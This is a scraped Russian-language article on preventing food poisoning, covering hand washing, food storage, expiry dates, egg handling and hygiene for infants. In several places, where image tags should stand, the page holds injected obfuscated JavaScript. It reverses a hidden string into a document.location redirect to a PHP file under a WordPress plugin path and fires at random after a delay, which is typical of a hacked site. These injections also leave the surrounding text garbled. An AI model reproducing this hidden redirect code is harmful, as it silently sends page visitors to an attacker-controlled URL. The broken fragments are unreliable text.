Как предотвратить пищевые отравления

Пищевое отравление – это заболевание, обусловленное заражением организма человека ядами или бактериями, приводящими к ряду характерных симптомов и расстройству ЖКТ. Получить отравление может каждый, и взрослый, и ребенок, а заразиться можно через несвежую пищу (продукты с истекшим сроком годности), еду, зараженную бактериями и обсемененную болезнетворными микроорганизмами, путем поедания продуктов, которые содержат яды и токсины (некоторая рыба, грибы, растительные пищевые добавки).

Недуг может присутствовать в легкой и острой форме – это определяет степень тяжести протекания симптомов, а так же сроки восстановления после отравления. В ряде случаев это заболевание может быть крайне опасным и даже привести к летальному исходу, особенно в детском возрасте, когда молодой организм еще не в силах оказывать должное противостояние инфекции. Исходя из этого, лучшей способ оставаться здоровым и не подвергать свою жизнь и жизнь своего ребенка опасности – это соблюдение профилактических мер.

Общие меры для предотвращения пищевых отравлений

Профилактические мероприятия в сфере пищевых отравлений условно можно разделить на:

  • соблюдение личной гигиены (тщательное мытье рук с мылом перед каждым приемом пищи);
  • соблюдение пищевой гигиены (хранение продуктов питания должным образом, не допуская истечения срока годности, а так же их правильная обработка перед употреблением).

Для того чтобы все оставались здоровы, следует ознакомиться с рядом предосторожностей и советов, которыми нельзя пренебрегать в рамках профилактики. О мерах предосторожности должны быть осведомлены не только взрослые, но и дети, активная жизнь которых часто проходит в непосредственном контакте с большим количеством микробов и бактерий.

Помимо соблюдения санитарно-эпидемиологических норм на домашней кухне, гигиенических мер и пищевой предосторожности следует также иметь ряд специальных знаний касательно токсинов, ядов и биологических компонентов, в которых они содержатся. В такой ситуации важно разбираться, какие грибы съедобные, а какие опасные для жизни – этому нужно научить и ребенка, помимо грибов существуют различные токсичные ягоды, которых также следует опасаться.

Ядовитые грибы и ягоды (фото)

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»8958,8959,8960″]

Специалистами в сфере эпидемиологии были разработаны правила, соблюдение которых способно предотвратить пищевые отравления:

  • приобретение продуктов питания в местах несанкционированной торговли, а так же местах, где не соблюдаются, либо не могут быть соблюдены санитарно-эпидемиологические нормы, категорически запрещено. В первую очередь это касается продуктов, которые характеризуются как скоропортящиеся (молочные продукты, консервация и т.д.);
  • следует приобретать продукты питания в крупных магазинах, в которых весь персонал, имеющий отношение к продуктам питания и взаимодействующий с ними, располагает возможностью прибегнуть к использованию централизованного холодного и горячего водоснабжения, а так же санузла. Такие минимальные возможности позволяют снизить риск заражения продуктов реализации и производства болезнетворными микробактериями;
  • приобретая скоропортящиеся продукты питания, например, молочные и кисломолочные продукты, готовые салаты, колбасы, кондитерские изделия и т. п. обращайте внимание на срок годности. Еще одним важным фактором, кроме максимально возможного срока хранения, являются температурные условия хранения и содержания покупаемых продуктов;
  • строго запрещено употреблять в пищу продукты с просроченным сроком годности, а так же ту пищу, температурные условия хранения которой были нарушены или не соблюдались;
  • $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/05/78573_1280_1024-365×292.jpg» alt=»Фрукты в вазе на столе» width=»365″ height=»292″ /> Ягоды и фрукты нужно обязательно тщательно мыть перед употреблением

    следует соблюдать правила соседства при хранении пищевых заготовок и готовой еды в холодильнике. Соседнее хранение полуфабрикатов и уже термически обработанной пищи может привести к заражению еды готовой к употреблению. Такие правила соседства должны быть соблюдены и в местах реализации пищевой продукции, заведениях общественного питания и т. п., поэтому обращайте внимание на соседние полки в магазине, с которых берутся товары;

  • продукты, которые употребляются в сыром виде, в частности ягоды, фрукты и овощи, должны быть тщательно вымыты или обработаны антисептическими, антибактериальными средствами;
  • использование в пищу испорченных продуктов питания, которые потеряли свой естественный вид, слегка подгнили, либо их кожура была повреждена – не рекомендуется;
  • не следует покупать продукты без соответствующей маркировки, на которой должна быть указана вся информация по их составу и сроку, правилам хранения. Испорченная или поврежденная упаковка не гарантирует того, что этот товар безопасен для употребления и не заражен болезнетворными микроорганизмами;

Следует мыть руки при каждой возможности: перед приемом пищи, перед тем, как начнете эту пищу готовить, а также после туалета и прогулки. В ситуациях, если на руке есть ранки или ссадины, либо другие повреждения, следует отнестись к процессу готовки крайне внимательно и осторожно, не допуская контакта раны с едой. Пораженное место следует забинтовать или надеть перчатки.

  • $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/05/20130224210623-365×243.jpg» alt=»Человек моет руки» width=»365″ height=»243″ /> Мыть руки — очень важно, каким бы «набившим оскомину» ни был этот совет

    особое внимание следует уделять термической обработке при приготовлении пищи, обеспечивая хороший уровень прожарки либо другой метод приготовления для гибели всех возбудителей кишечных заболеваний;

  • яйца, как довольно «капризный» продукт, следует подвергать дополнительной обработке — их нужно мыть под проточной водой с применением хозяйственного мыла. Варить яйца следует не меньше 10-ти минут после их закипания, так как они могут быть заражены сальмонеллезом. Все кулинарные изделия, приготовленные с применением яиц – являются скоропортящимися и требуют определенных условий для их хранения. Температура хранения этих кулинарных изделий должна быть в рамках + 2-6 ?С;
  • $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/05/Lana-K-365×254.jpg» alt=»Женщина вытирает кухонный стол» width=»365″ height=»254″ /> Чистота кухонных поверхностей тоже играет важную роль в профилактике отравлений

    для того чтобы блюда были защищены от попадания в них насекомых и вредоносных микроорганизмов, их следует заматывать в пищевую пленку, для того, чтобы процесс их хранения был безопасным и не представлял угрозы для жизни и здоровья других людей;

  • соблюдение чистоты на кухонных поверхностях, а так же чистоты кухонного инвентаря, позволит отгородить себя и своих близких от пищевых отравлений;
  • следует иметь отдельное разделочное оборудование (доски и ножи) для работы с сырыми и уже приготовленными продуктами.

Профилактические меры для маленьких детей

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/05/podarok-malyshu-365×243.jpg» alt=»Маленький ребенок грызет игрушку» width=»365″ height=»243″ /> Игрушки нужно периодически промывать кипячёной водой

В силу того, что маленькие дети активно познают окружающий мир, имея постоянный контакт с полом и различными предметами, которые достаточно часто оказываются во рту, они нуждаются в особенной заботе и профилактике. Для грудничков и малышей, которые только познают окружающий мир,предлагаются следующие мероприятия по профилактике пищевых отравлений:

    • так как малыш не может самостоятельно вымыть руки – это нужно делать родителям, используя косметические и антибактериальные средства;
  • игрушки, с которыми малыш постоянно играет и контактирует необходимо время от времени промывать кипяченой водой;
  • полы в комнате, где ребенок ползает, должны хорошо вымываться;
  • материнское молоко позволяет ребенку усиливать собственный иммунитет, чтобы в дальнейшем справляться с вирусами и бактериями, а раннее отучение грудничка от грудного вскармливания может вызвать ряд заболеваний, в том числе и пищевые отравления, из-за несостоятельности иммунной системы;
  • молочные смеси и каши для грудничков должны храниться только в холодильнике, а их максимальный срок хранения и употребления не должен игнорироваться.
Adblock
detector